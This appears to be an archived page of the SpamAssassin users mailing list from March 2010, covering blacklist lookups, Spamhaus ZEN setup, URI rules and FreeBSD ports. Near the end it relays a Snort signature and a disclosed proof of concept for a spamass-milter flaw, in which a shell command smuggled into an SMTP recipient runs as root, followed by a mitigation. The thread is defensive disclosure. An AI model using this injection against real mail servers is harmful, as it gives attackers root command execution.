RE: How to find where email server has been blacklisted

2010-03-08 Thread Stanier, Alan M
That would be a very useful site, except that it shows the results as 
colour-coded icons, and I see the listed and not-listed icons as identical.

-Original Message-
From: Mikael Syska [mailto:mik...@syska.dk] 
Sent: 08 March 2010 01:56
To: users@spamassassin.apache.org
Subject: Re: How to find where email server has been blacklisted

Hi,

This site works for me:
http://whatismyipaddress.com/staticpages/index.php/is-my-ip-address-blacklisted

mvh

On Mon, Mar 8, 2010 at 1:24 AM, Rops roberta3...@yahoo.com wrote:

 Hello

 I'm trying to figure out why some emails get lost, which most likely is due
 to emails being killed by the ISP spam filter because of the high spam score
 these lost emails have.

 How do I find out if a mail server is blacklisted, and where?
 Is there any central database for queries against all the different blacklists?
 An IP-based search is also required, with data on when and why.


 An IP-based search may be needed, as the server in question has its mailbox
 hosted with the ISP, but I believe that the virtual server can still be
 blacklisted separately based on its static IP and not the whole ISP mail
 server.

 An additional side effect is that emails sent inside the company get lost more
 often - I believe because the virtual server is blacklisted somewhere and
 therefore emails sent always gather a higher spam score.
 So the question is how to find out where it's blacklisted.


 Thanks for any help and guidelines how and where to continue!
 --
 View this message in context: 
 http://old.nabble.com/How-to-find-where-email-server-has-been-blacklisted-tp27815915p27815915.html
 Sent from the SpamAssassin - Users mailing list archive at Nabble.com.




Scanning HUGE emails - headers only scan

2010-03-08 Thread Andrzej Adam Filip
Do you think it would make sense to introduce options for scanning
headers only in big messages?

I have received recently a new (small) wave of big spams.

-- 
[plen: Andrew] Andrzej Adam Filip : a...@onet.eu
There is nothing new except what has been forgotten.
  -- Marie Antoinette


Re: How to find where email server has been blacklisted

2010-03-08 Thread Mikael Syska
Hi,

Then something is broken at your end ...

I see 4 icons ... timeout, listed, non-listed  and offline.

Or am I missing your point here ?

mvh

On Mon, Mar 8, 2010 at 9:02 AM, Stanier, Alan M a...@essex.ac.uk wrote:
 That would be a very useful site, except that it shows the results as 
 colour-coded icons, and I see the listed and not-listed icons as identical.

 -Original Message-
 From: Mikael Syska [mailto:mik...@syska.dk]
 Sent: 08 March 2010 01:56
 To: users@spamassassin.apache.org
 Subject: Re: How to find where email server has been blacklisted

 Hi,

 This site works for me:
 http://whatismyipaddress.com/staticpages/index.php/is-my-ip-address-blacklisted

 mvh

 On Mon, Mar 8, 2010 at 1:24 AM, Rops roberta3...@yahoo.com wrote:

 Hello

 I'm trying to figure out why some emails get lost, which most likely is due
 to emails being killed by the ISP spam filter because of the high spam score
 these lost emails have.

 How do I find out if a mail server is blacklisted, and where?
 Is there any central database for queries against all the different blacklists?
 An IP-based search is also required, with data on when and why.


 An IP-based search may be needed, as the server in question has its mailbox
 hosted with the ISP, but I believe that the virtual server can still be
 blacklisted separately based on its static IP and not the whole ISP mail
 server.

 An additional side effect is that emails sent inside the company get lost more
 often - I believe because the virtual server is blacklisted somewhere and
 therefore emails sent always gather a higher spam score.
 So the question is how to find out where it's blacklisted.


 Thanks for any help and guidelines how and where to continue!
 --
 View this message in context: 
 http://old.nabble.com/How-to-find-where-email-server-has-been-blacklisted-tp27815915p27815915.html
 Sent from the SpamAssassin - Users mailing list archive at Nabble.com.





Re: How to find where email server has been blacklisted

2010-03-08 Thread Mike Cardwell

On 08/03/2010 00:24, Rops wrote:


I'm trying to figure out why some emails get lost, which most likely is due
to emails being killed by the ISP spam filter because of the high spam score
these lost emails have.

How do I find out if a mail server is blacklisted, and where?
Is there any central database for queries against all the different blacklists?
An IP-based search is also required, with data on when and why.


An IP-based search may be needed, as the server in question has its mailbox
hosted with the ISP, but I believe that the virtual server can still be
blacklisted separately based on its static IP and not the whole ISP mail
server.

An additional side effect is that emails sent inside the company get lost more
often - I believe because the virtual server is blacklisted somewhere and
therefore emails sent always gather a higher spam score.
So the question is how to find out where it's blacklisted.

Thanks for any help and guidelines how and where to continue!


I wrote a Perl app a while ago to do lots of DNSBL lookups - 
https://secure.grepular.com/projects/DNSBLSearch


Example usage:

m...@haven:~$ dnsblsearch.pl 92.48.122.147 94.76.192.48/29
m...@haven:~$

If I look up 127.0.0.2 it should be listed by most DNSBLs as it's a test IP:

m...@haven:~$ dnsblsearch.pl 127.0.0.2
127.0.0.2 is listed on dnsbl-2.uceprotect.net 127.0.0.2
127.0.0.2 is listed on blackholes.five-ten-sg.com 127.0.0.2
127.0.0.2 is listed on combined.njabl.org 127.0.0.2, 127.0.0.6
127.0.0.2 is listed on bl.spamcop.net 127.0.0.2
127.0.0.2 is listed on list.dnswl.org 127.0.10.0
127.0.0.2 is listed on b.barracudacentral.org 127.0.0.2
127.0.0.2 is listed on ix.dnsbl.manitu.net 127.0.0.2
127.0.0.2 is listed on psbl.surriel.com 127.0.0.2
127.0.0.2 is listed on hostkarma.junkemailfilter.com 127.0.0.4, 
127.0.0.5, 127.0.1.1, 127.0.1.2, 127.0.1.3, 127.0.2.3, 127.0.0.1, 
127.0.0.2, 127.0.0.3
127.0.0.2 is listed on bl.spameatingmonkey.net 127.0.0.8, 127.0.0.10, 
127.0.0.2, 127.0.0.3, 127.0.0.4

127.0.0.2 is listed on spamguard.leadmon.net 127.0.0.2
127.0.0.2 is listed on spamsources.fabel.dk 127.0.0.2
127.0.0.2 is listed on dnsbl-1.uceprotect.net 127.0.0.2
127.0.0.2 is listed on dnsbl.sorbs.net 127.0.0.4, 127.0.0.5, 127.0.0.6, 
127.0.0.7, 127.0.0.8, 127.0.0.9, 127.0.0.10, 127.0.0.2, 127.0.0.3

127.0.0.2 is listed on ubl.unsubscore.com 127.0.0.2
127.0.0.2 is listed on zen.spamhaus.org 127.0.0.2, 127.0.0.4, 127.0.0.10
127.0.0.2 is listed on no-more-funn.moensted.dk 127.0.0.2
127.0.0.2 is listed on ips.backscatterer.org 127.0.0.2
127.0.0.2 is listed on dnsbl-3.uceprotect.net 127.0.0.2
m...@haven:~$

It does the lookups concurrently so it's quite quick.

--
Mike Cardwell - Perl/Java/Web developer, Linux admin, Email admin
Read my tech Blog -  https://secure.grepular.com/
Follow me on Twitter -   http://twitter.com/mickeyc
Hire me - http://cardwellit.com/ http://uk.linkedin.com/in/mikecardwell


Re: How to find where email server has been blacklisted

2010-03-08 Thread Yet Another Ninja

On 2010-03-08 1:24, Rops wrote:

Hello

I'm trying to figure out why some emails get lost, which most likely is due
to emails being killed by the ISP spam filter because of the high spam score
these lost emails have.

How do I find out if a mail server is blacklisted, and where?
Is there any central database for queries against all the different blacklists?
An IP-based search is also required, with data on when and why.


An IP-based search may be needed, as the server in question has its mailbox
hosted with the ISP, but I believe that the virtual server can still be
blacklisted separately based on its static IP and not the whole ISP mail
server.

An additional side effect is that emails sent inside the company get lost more
often - I believe because the virtual server is blacklisted somewhere and
therefore emails sent always gather a higher spam score.
So the question is how to find out where it's blacklisted.


Thanks for any help and guidelines how and where to continue!


http://www.robtex.com/


Zen.spamhous.org score for spam assassin...

2010-03-08 Thread Dhaval Soni
Dear All,

I want to use zen.spamhous.org for spam check. So we need to make an entry in the
spam.lists.conf file. But do we need to mention a score for it? If yes, where
do we do it?

Thanks in advance,

-- 
Kind regards,
Dhaval Soni
Red Hat Certified Architect
RHCE No: 804007900325939

Cell: +91-966 20 29 620
*

Wiki: https://fedoraproject.org/wiki/User:Sonidhaval


Re: Zen.spamhous.org score for spam assassin...

2010-03-08 Thread Yet Another Ninja

On 2010-03-08 12:29, Dhaval Soni wrote:

Dear All,

I want to use zen.spamhous.org for spam check. So we need to make an entry in the
spam.lists.conf file. But do we need to mention a score for it? If yes, where
do we do it?


spam.lists.conf is not part of Spamassassin (sounds like MailScanner)

Pls see:
http://www.spamhaus.org/faq/answers.lasso?section=Spamhaus%20DBL


Re: Zen.spamhous.org score for spam assassin...

2010-03-08 Thread Karsten Bräckelmann
On Mon, 2010-03-08 at 16:59 +0530, Dhaval Soni wrote:
 Dear All,
 
 I want to use zen.spamhous.org for spam check. So we need to do entry

SA ships with Spamhaus ZEN enabled by default.

 in spam.lists.conf file. But do we need to mention score for it? If
 yes, where to do it?

That's not a SA configuration file.

Reminds me of your recent question, how to update latest bayes database.
This time, it is not urgent?





Re: How to find where email server has been blacklisted

2010-03-08 Thread Brian
On Mon, 2010-03-08 at 10:51 +0100, Mikael Syska wrote:
 Hi,
 
 Then something is broken at your end ...
 
 I see 4 icons ... timeout, listed, non-listed  and offline.
 
 Or am I missing your point here ?

*HINT* Are you colour blind or normal sighted?



Fw: spam filter using spamassassin mails

2010-03-08 Thread nehaya Mohammad


--- On Mon, 3/8/10, nehaya Mohammad nehaya.moham...@yahoo.com wrote:


From: nehaya Mohammad nehaya.moham...@yahoo.com
Subject: spam filter using spamassassin mails
To: mailus...@spamassassin.apache.org
Date: Monday, March 8, 2010, 10:23 AM

Dear sir,
I hope you are doing fine.
I'm a graduate student at the University of Jordan and I'm doing my research
on the use of fuzzy clustering for email filtering. I'm using data from
SpamAssassin in my experiments and I got results with a success rate of 91%. I would
like to use the filter developed by SpamAssassin to compare my results with
yours on the same data set (emails) that you have on the website. I would also
like to know whether the filter you built is Bayesian-based only or based on
other techniques.

If you have any other users who built spam filters using the mails that are
available at your site, I would appreciate it if you could send me any references
about them.

I would be very grateful if you could provide me with the implementation of the
tools you used.
Thanks,
have a nice day



Re: Zen.spamhous.org score for spam assassin...

2010-03-08 Thread Kai Schaetzl
Dhaval Soni wrote on Mon, 8 Mar 2010 16:59:20 +0530:

 Dhaval Soni

From this and your other message on this list I gather that you didn't 
read any documentation. So, please go and read documentation. There are 
also many tutorials on the web on using SA.
I also deduce from spam.lists.conf that you are using MailScanner and 
did not read any documentation about it either nor even look in that file. 

*Read documentation before using complex software such as this!*

If you don't understand what you are doing or reading hire someone to do 
it for you.


Kai

-- 
Get your web at Conactive Internet Services: http://www.conactive.com





Re: Zen.spamhous.org score for spam assassin...

2010-03-08 Thread Brian
Is zen.spamhous.org new? Personally I'd check your spelling ;-)



Re: Zen.spamhous.org score for spam assassin...

2010-03-08 Thread Mike Cardwell

On 08/03/2010 12:34, Brian wrote:


Is zen.spamhous.org new? Personally I'd check your spelling ;-)


m...@haven:~$ host 1.0.0.127.zen.spamhous.org
1.0.0.127.zen.spamhous.org      A       208.73.210.27
m...@haven:~$ host 1.2.3.4.zen.spamhous.org
1.2.3.4.zen.spamhous.org        A       208.73.210.27
m...@haven:~$

Wonder how many people that has tripped up in its time.

--
Mike Cardwell - Perl/Java/Web developer, Linux admin, Email admin
Read my tech Blog -  https://secure.grepular.com/
Follow me on Twitter -   http://twitter.com/mickeyc
Hire me - http://cardwellit.com/ http://uk.linkedin.com/in/mikecardwell


Re: Zen.spamhous.org score for spam assassin...

2010-03-08 Thread Brian
On Mon, 2010-03-08 at 12:41 +, Mike Cardwell wrote:
 On 08/03/2010 12:34, Brian wrote:
 
  Is zen.spamhous.org new? Personally I'd check your spelling ;-)
 
 m...@haven:~$ host 1.0.0.127.zen.spamhous.org
 1.0.0.127.zen.spamhous.org      A       208.73.210.27
 m...@haven:~$ host 1.2.3.4.zen.spamhous.org
 1.2.3.4.zen.spamhous.org        A       208.73.210.27
 m...@haven:~$
 
 Wonder how many people that has tripped up in its time.
I wonder if Claus at UCEProtect registered that? Two things make me
wonder. First, he is said to be a cyber-squatter, but the clincher for
me is using 'zen.spamhous.org' results in a positive return and high
false positive rate 
}}} GRIN 




Re: How to find where email server has been blacklisted

2010-03-08 Thread Mikael Syska
Hi

On Mon, Mar 8, 2010 at 11:01 AM, Brian
brel.astersik100...@copperproductions.co.uk wrote:
 On Mon, 2010-03-08 at 10:51 +0100, Mikael Syska wrote:
 Hi,

 Then something is broken at your end ...

 I see 4 icons ... timeout, listed, non-listed  and offline.

 Or am I missing your point here ?

 *HINT* Are you colour blind or normal sighted?


Ahhh, now I see the problem :-) Thanks for pointing it out to a very
slow and tired

mvh


Re: How to find where email server has been blacklisted

2010-03-08 Thread Bowie Bailey
Rops wrote:
 How to find out if some mail server is blacklisted and where?
 Is there any central database for queries from all different blacklists?
 Also IP based search is required and data when and why.
   

I've been using this one:

http://www.mxtoolbox.com/blacklists.aspx

I'm not sure what information you can get if you are listed.  I have not
had that problem so far.

-- 
Bowie


Re: Hidden Dir in URI (Was: FreeMail plugin updated - banks)

2010-03-08 Thread Ned Slider

Adam Katz wrote:

On 15-May-2009, at 12:46, Adam Katz wrote:

uri URI_HIDDEN /.{7}\/\../


LuKreme wrote:

That won't catch
http://www.spammer.example.com/.../hidden-malware.asf, it will only
catch the relative url form ../path/to/content which SA improperly
prefaces with "http://"

uri URI_HIDDEN /.{8}\/\../


Works for me:

$ echo http://www.spammer.example.com/.../hidden-malware.asf |perl -ne
'$_ = "http://$_" unless m{^[a-z]+://}; print "hits\n" if /.{8}\/\../'
hits
$
$ echo 'href=../not/a/hidden/directory' |perl -ne '$_ = "http://$_"
unless m{^[a-z]+://}; print "hits\n" if /.{8}\/\../'
$



For some time now I've been running

uri LOCAL_URI_HIDDEN_DIR /.{8}\/\../

as discussed above and it works extremely well with few FPs.

However, today I did notice a FP on this type of URI with multiple 
relative paths:


../../../../blah

So I've refined the rule to specifically exclude hitting on the sequence 
../. which stops the rule triggering on multiple relative paths.


uri LOCAL_URI_HIDDEN_DIR /(?!.{6}\.\.\/\..).{8}\/\../

Tested, and all seems good so feel free to update if you're using this 
rule locally.


Note: I'm still on 3.2.5 so I don't know if this rule ever got 
officially picked up in 3.3.x
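To see the two rules behave as the thread describes, here is an added Python harness (not SpamAssassin code; the regexes are LuKreme's and Ned's as quoted above, the sample URIs are constructed) that applies both rules to the thread's three cases plus two that are worth checking before deploying the rule locally: a legitimate .well-known path, and a lone /../ in an absolute URI. Both of those hit either rule, because the pattern is a slash, a dot and any character, and the refinement only excludes a run of ../ sequences.

```python
"""The two hidden-directory URI rules from this thread, evaluated side by side
over constructed URIs (added example; the regexes are the thread's, the
samples and harness are not SpamAssassin code)."""
import re
from typing import Dict, List, Tuple

# LuKreme's rule and Ned Slider's refinement, verbatim from the thread.
# Perl and Python agree on these constructs (\/ is a plain slash in both).
URI_HIDDEN = re.compile(r".{8}\/\..")
LOCAL_URI_HIDDEN_DIR = re.compile(r"(?!.{6}\.\.\/\..).{8}\/\..")


def normalize_uri(uri: str) -> str:
    """Mimic the behaviour the thread describes: SA prefixes http:// onto a
    scheme-less URI before uri rules see it (the same test Ned used in perl -ne)."""
    return uri if re.match(r"^[a-z]+://", uri) else "http://" + uri


def hits(pattern: "re.Pattern[str]", uri: str) -> bool:
    """True when the rule would fire on this URI as SA would see it."""
    return pattern.search(normalize_uri(uri)) is not None


def evaluate(uris: List[str]) -> Dict[str, Tuple[bool, bool]]:
    """Return {uri: (URI_HIDDEN hit, LOCAL_URI_HIDDEN_DIR hit)}."""
    return {u: (hits(URI_HIDDEN, u), hits(LOCAL_URI_HIDDEN_DIR, u)) for u in uris}


# Constructed samples: the thread's three cases plus two edge cases.
SAMPLES = [
    "http://www.spammer.example.com/.../hidden-malware.asf",  # the spam case: both hit
    "href=../not/a/hidden/directory",                        # relative path: neither hits
    "../../../../blah",                                      # Ned's FP: old hits, new does not
    "https://example.com/.well-known/acme-challenge/token",   # legitimate dot-dir: both hit
    "http://www.example.com/../index.html",                  # a single /../ : both hit
]

if __name__ == "__main__":
    for uri, (old, new) in evaluate(SAMPLES).items():
        print(f"{'OLD' if old else '   '} {'NEW' if new else '   '}  {uri}")
```

The harness works on the raw URI string; whether SA's own URI extraction normalizes a /../ before the rule sees it is not something it tests.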




Re: SA 3.3.0 depends on Perl 5.10 (FreeBSD Ports)???

2010-03-08 Thread Royce Williams
On Sun, Mar 7, 2010 at 10:26 PM, LuKreme krem...@kreme.com wrote:
 On 7-Mar-2010, at 10:08, LuKreme wrote:
 On 7-Mar-2010, at 08:31, Royce Williams wrote:

 Semi-OT, but portsnap(8) makes fetching the ports indexes no longer
 necessary.

 I'd never heard of it, but am reading the man page now. Sounds great!

 Quick question, if I do portsnap cron in the crontab, when do I do portsnap 
 update?

Short answer:

To apply updates automatically, string the commands together
(portsnap cron update).

ro...@heffalump$ sudo portsnap cron update
Removing old files and directories... done.
Extracting new files:
/usr/ports/devel/bugzilla/
/usr/ports/mail/postfix26/
Building new INDEX files... done.
ro...@heffalump$

or hush it with:

ro...@heffalump$ sudo portsnap cron update > /dev/null
ro...@heffalump$


Long details:

This is getting pretty OT, but here is some more info; non-FreeBSD
folk need not apply. :-)

With this family of utilities by Colin Percival (which includes the
OS-patching freebsd-update(8)), if you use only the 'cron' option,
there will only be output when there is a change. This lets you
schedule the check, only get notified when changes are actually
downloaded, and then choose when to act on them.

For portsnap(8), you may or may not want to tack on a '> /dev/null' at the
end, since updates to the ports tree are happening all the time.  I do
this, and I just let the weekly reports tell me when I have non-urgent
updates available in my installed ports
(weekly_status_pkg_enable=YES in [/usr/local]/etc/periodic.conf).  I
let portaudit(1) tell me daily if there are any vulnerabilities.

Some folks want to know about updates to their ports right away, so
they do something like this:

ro...@heffalump$ portsnap cron update > /dev/null && portversion -v -L =
lsof-4.83,5   needs updating (port has 4.84A,5)
mysql-server-5.0.89   needs updating (port has 5.0.90)
nmap-5.21 needs updating (port has 5.21_1)
ro...@heffalump$


Other folks, especially those on low-bandwidth or metered connections,
don't want to download actual updates until there are changes to ports
that they care about.  They use the '-I' option to just fetch the
index (which also just fetches deltas, very low-bandwidth), and then
compare the index with their installed ports to check for available
updates:

ro...@heffalump$ portsnap cron -I > /dev/null && portversion -vL =
[same output as above]


Since portsnap deltas are relatively low-bandwidth, I prefer a full
daily sync so that I can casually install a new port and know that I'm
getting a version less than 24 hours old.

Share and Enjoy(TM). :-)

Royce


Re: Zen.spamhous.org score for spam assassin...

2010-03-08 Thread Darxus
This is slightly confusing.  SA does use zen by default, but zen is an
aggregate blacklist, and the tests are broken up into its pieces:

RCVD_IN_PBL
RCVD_IN_XBL
RCVD_IN_SBL

On 03/08, Dhaval Soni wrote:
Dear All,
 
I want to use zen.spamhous.org for spam check. So we need to make an entry
in the spam.lists.conf file. But do we need to mention a score for it? If yes,
where do we do it?

-- 
Every normal man must be tempted at times to spit upon his hands,
hoist the black flag, and begin slitting throats.
 - Henry Louis Mencken (1880-1956)
http://www.ChaosReigns.com
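The pieces of these two threads that a practitioner would script, brought together in one added Python example that is not dnsblsearch.pl, SpamAssassin or Spamhaus code: the reversed-octet query that dnsblsearch.pl issues per zone (Mike Cardwell's post above), the zone sanity check that would have caught zen.spamhous.org answering the same public address for every name (the host(1) exchange above), and the ZEN answer-code to SBL/XBL/PBL mapping Darxus describes. The zone list, the 192.0.2.10 sample address and fake_resolver are constructed so the example runs offline; pass system_resolver instead to query real zones.

```python
"""DNSBL lookups with the checks a practitioner should run first: reversed-
octet query names, concurrent zone queries, and two sanity checks on each
zone before trusting its answers (added example; not dnsblsearch.pl or SA)."""
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Dict, List

# Spamhaus ZEN answer codes and the SpamAssassin rule each feeds, per the
# thread: SA ships ZEN enabled and splits it into SBL/XBL/PBL rules.
ZEN_CODES = {
    "127.0.0.2": "SBL -> RCVD_IN_SBL",
    "127.0.0.3": "SBL CSS -> RCVD_IN_SBL",
    "127.0.0.4": "XBL (CBL) -> RCVD_IN_XBL",
    "127.0.0.5": "XBL -> RCVD_IN_XBL",
    "127.0.0.6": "XBL -> RCVD_IN_XBL",
    "127.0.0.7": "XBL -> RCVD_IN_XBL",
    "127.0.0.10": "PBL -> RCVD_IN_PBL",
    "127.0.0.11": "PBL -> RCVD_IN_PBL",
}

Resolver = Callable[[str], List[str]]  # query name -> list of A records


def dnsbl_query_name(ip: str, zone: str) -> str:
    """192.0.2.10 + zen.spamhaus.org -> 10.2.0.192.zen.spamhaus.org.
    IPv4Address() raises ValueError on anything that is not one address,
    so hostnames or CIDR ranges never reach the resolver by accident."""
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ".".join(reversed(octets)) + "." + zone


def system_resolver(name: str) -> List[str]:
    """Real lookup through the OS resolver; NXDOMAIN means 'not listed'."""
    try:
        infos = socket.getaddrinfo(name, None, socket.AF_INET)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def is_dnsbl_answer(addr: str) -> bool:
    """RFC 5782 lists answer inside 127.0.0.0/8. A public address such as the
    208.73.210.27 in the thread means a parked or typo domain, not a list."""
    return ipaddress.IPv4Address(addr) in ipaddress.IPv4Network("127.0.0.0/8")


def zone_is_sane(zone: str, resolve: Resolver) -> bool:
    """RFC 5782 test points: 127.0.0.2 must be listed, 127.0.0.1 must not be.
    A wildcard zone that answers for every name fails the second test."""
    listed = resolve(dnsbl_query_name("127.0.0.2", zone))
    unlisted = resolve(dnsbl_query_name("127.0.0.1", zone))
    return bool(listed) and all(is_dnsbl_answer(a) for a in listed) and not unlisted


def check_ip(ip: str, zones: List[str], resolve: Resolver,
             workers: int = 16) -> Dict[str, List[str]]:
    """Query every zone concurrently; return {zone: [answer codes]} for hits."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        answers = list(pool.map(lambda z: (z, resolve(dnsbl_query_name(ip, z))), zones))
    return {zone: codes for zone, codes in answers if codes}


def explain(zone: str, codes: List[str]) -> List[str]:
    """Translate answer codes for the zone we know; pass others through."""
    if zone == "zen.spamhaus.org":
        return [ZEN_CODES.get(c, f"unknown ZEN code {c}") for c in codes]
    return codes


def fake_resolver(name: str) -> List[str]:
    """Constructed offline stand-in for DNS. The zen.spamhaus.org test-point
    answer mirrors the dnsblsearch output in the thread; 192.0.2.10 (TEST-NET-1)
    is a made-up listed host; the typo zone answers for every name, as the
    host(1) output in the thread shows."""
    if name.endswith(".zen.spamhous.org"):
        return ["208.73.210.27"]
    table = {
        "2.0.0.127.zen.spamhaus.org": ["127.0.0.2", "127.0.0.4", "127.0.0.10"],
        "10.2.0.192.zen.spamhaus.org": ["127.0.0.4"],
        "2.0.0.127.bl.spamcop.net": ["127.0.0.2"],
    }
    return table.get(name, [])


if __name__ == "__main__":
    zones = ["zen.spamhaus.org", "bl.spamcop.net", "zen.spamhous.org"]
    for z in zones:
        print(f"{z}: {'ok' if zone_is_sane(z, fake_resolver) else 'BROKEN, ignore its answers'}")
    good = [z for z in zones if zone_is_sane(z, fake_resolver)]
    for zone, codes in check_ip("192.0.2.10", good, fake_resolver).items():
        print(f"192.0.2.10 is listed on {zone}: {', '.join(explain(zone, codes))}")
```

Run the sanity check once per zone at startup rather than per address: a zone that fails it is either down, wildcarded, or not a DNSBL at all, and counting its answers is how a misspelt zone name quietly turns into a 100% false-positive rate.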


Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-08 Thread Michael Scheidell
just a heads up:  I don't know if there is a problem with SA milter, but 
there is a snort signature for it now.



 Original Message 
Subject: 	[Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote 
Arbitrary Command Injection Attempt

Date:   Mon, 8 Mar 2010 13:03:52 +
From:   Kevin Ross kevros...@googlemail.com
To: 	emerging-s...@emergingthreats.net 
emerging-s...@emergingthreats.net, Matt Jonkman jonk...@jonkmans.com




alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible 
SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt"; 
flow:established,to_server; content:"to|3A|"; nocase; 
content:"root+|3A|\|7C|"; nocase; within:15; classtype:attempted-user; 
reference:url,www.securityfocus.com/bid/38578; 
reference:url,seclists.org/fulldisclosure/2010/Mar/140; sid:1324412; rev:1;)


Kev


__
This email has been scanned and certified safe by SpammerTrap(r). 
For Information please see http://www.secnap.com/products/spammertrap/

__  
___
Emerging-sigs mailing list
emerging-s...@emergingthreats.net
http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

Support Emerging Threats! Get your ET Stuff! Tshirts, Coffee Mugs and Lanyards
http://www.emergingthreats.net/index.php/support-et-and-buy-et-schwag.html
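What the rule above does and does not fire on, as an added Python matcher (not Snort and not the ET rule itself) run over constructed SMTP client bytes modelled on the PoC quoted later in this thread. The archive has garbled the escaping of the rule's second content; the example assumes it is the byte string root+:| and says so in the code.

```python
"""A small re-implementation of the Emerging Threats rule's matching logic,
run over constructed SMTP traffic (added example; not Snort, not the rule)."""
from typing import List

# Assumption: the rule's second content, garbled by the archive, is the byte
# string root+:| (root, plus, colon, pipe), the prefix of the PoC recipient.
FIRST = b"to:"
SECOND = b"root+:|"
WITHIN = 15  # within:15 -> SECOND must lie in the 15 bytes after FIRST ends


def matches_signature(payload: bytes) -> bool:
    """Approximates: content "to|3A|" nocase; content SECOND nocase; within:15.
    Like Snort, retry with later occurrences of the first content when the
    relative match fails for the earlier one."""
    data = payload.lower()  # nocase on both contents
    start = 0
    while True:
        i = data.find(FIRST, start)
        if i < 0:
            return False
        end = i + len(FIRST)
        if SECOND in data[end:end + WITHIN]:
            return True
        start = i + 1


def scan(lines: List[bytes]) -> List[int]:
    """Indexes of the lines that would raise the alert."""
    return [n for n, line in enumerate(lines) if matches_signature(line)]


# Constructed client-to-server lines, modelled on the PoC quoted in this thread.
TRAFFIC = [
    b"EHLO attacker.example\r\n",
    b"MAIL FROM:<me@me.example>\r\n",
    b"rcpt to: root+:|touch /tmp/foo\r\n",                     # the PoC: alerts
    b"RCPT TO:<root+:|touch /tmp/foo>\r\n",                    # bracketed, upper case: alerts
    b"RCPT TO:<user+tag@example.com>\r\n",                     # legitimate plus-address: no alert
    b"To: root+:|touch@example.com\r\n",                       # a header inside DATA: also alerts
    b"RCPT TO:" + b" " * 16 + b"root+:|touch /tmp/foo\r\n",   # pushed past 15 bytes: missed
]

if __name__ == "__main__":
    for n in scan(TRAFFIC):
        print("ALERT:", TRAFFIC[n].rstrip().decode())
```

Two things stand out in the output: nothing anchors the rule to RCPT TO, so a To: header inside DATA fires it as well, and the within:15 bound is the only anchoring there is, so sixteen bytes of padding after to: take the pattern out of the window. Whether an MTA would accept a recipient padded that way is a separate question this example does not answer.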


rules

2010-03-08 Thread Renata Dias
Some messages receive a score of 0.00/0.00 and others receive the correct score,
like the example below.


2010-03-08 16:30:42.038813500 simscan:[63157]:SPAM REJECT
(20.90/6.00):215.7090s:[SPAM] Catch the moment poltronieri! 85% Fire
Sale:84.224.133.193:poltroni...@provale.com.br:poltroni...@provale.com.br
2010-03-08 16:30:43.816889500 simscan:[63232]:CLEAN
(8.50/6.00):215.5769s:[SPAM]
=?iso-8859-1?Q?Conquistando_o_padr=E3o_de_excel=EAncia_em_tratamento?=:200.234.196.130:
acquasolut...@acquasolution.com:jua...@saaeg.com.br
2010-03-08 16:30:45.851526500 simscan:[63300]:CLEAN
(2.40/6.00):215.5192s:Resposta Automatica:200.205.19.5:
gbr...@carlsonwagonlit.com.br:kafeho...@kafehotel.com.br
2010-03-08 16:30:47.275884500 simscan:[67507]:CLEAN
(0.00/0.00):2.9718s:Catch the moment preto! 85% Fire Sale:77.255.23.215:
pr...@provale.com.br:pr...@provale.com.br
2010-03-08 16:30:48.497625500 simscan:[67657]:CLEAN
(0.00/0.00):0.1194s:Comprovante da TED:200.234.214.155:
netexpre...@hm2655.locaweb.com.br:f...@provale.com.br

I've updated SpamAssassin to p5-Mail-SpamAssassin-3.3.0_3 and the rules are in
/var/db/spamassassin/3.003000/ .

Can someone help me?


-- 
Renata Dias


Spanish/Brazilian/Mexican spam

2010-03-08 Thread Charles Gregory


Hello!

I think I asked about this once before. I keep getting foreign language
spams with no obvious (to me) indicators that I could test for.

Can anyone take a look at this crud and see a header or flag/type that I 
could score in SA?


http://pastebin.com/3gGiaZVK

(Note: post is set to expire at 3pm Tues Mar 9)

Thanks!

- Charles


Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-08 Thread Ned Slider

Ned Slider wrote:

Brian wrote:


The key is this:

If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied recipient (RCPT TO).

POC IS

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me () me com
250 2.1.0 Ok
rcpt to: root+:|touch /tmp/foo
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo




Easily mitigated, you shouldn't be accepting mail to non-FQDN addresses

mail from: n...@example.com
250 2.1.0 Ok
rcpt to: root+:|touch /tmp/foo
504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need 
fully-qualified address

quit
221 2.0.0 Bye
Connection closed by foreign host.




That's Postfix 2.3.3 on RHEL5 BTW :-)

$ rpm -q postfix
postfix-2.3.3-2.1.el5_2.x86_64



Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-08 Thread Brian
On Mon, 2010-03-08 at 20:16 +, Ned Slider wrote:
 Brian wrote:
  On Mon, 2010-03-08 at 14:08 -0500, Michael Scheidell wrote:
  just a heads up:  I don't know if there is a problem with SA milter, but 
  there is a snort signature for it now.
 
 
   Original Message 
  Subject:   [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote 
  Arbitrary Command Injection Attempt
  Date:  Mon, 8 Mar 2010 13:03:52 +
  From:  Kevin Ross kevros...@googlemail.com
  To:emerging-s...@emergingthreats.net 
  emerging-s...@emergingthreats.net, Matt Jonkman jonk...@jonkmans.com
 
 
 
  alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible 
  SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt"; 
  flow:established,to_server; content:"to|3A|"; nocase; 
  content:"root+|3A|\|7C|"; nocase; within:15; classtype:attempted-user; 
  reference:url,www.securityfocus.com/bid/38578; 
  reference:url,seclists.org/fulldisclosure/2010/Mar/140; sid:1324412; rev:1;)
 
  Kev
 
  
  The key is this:
  
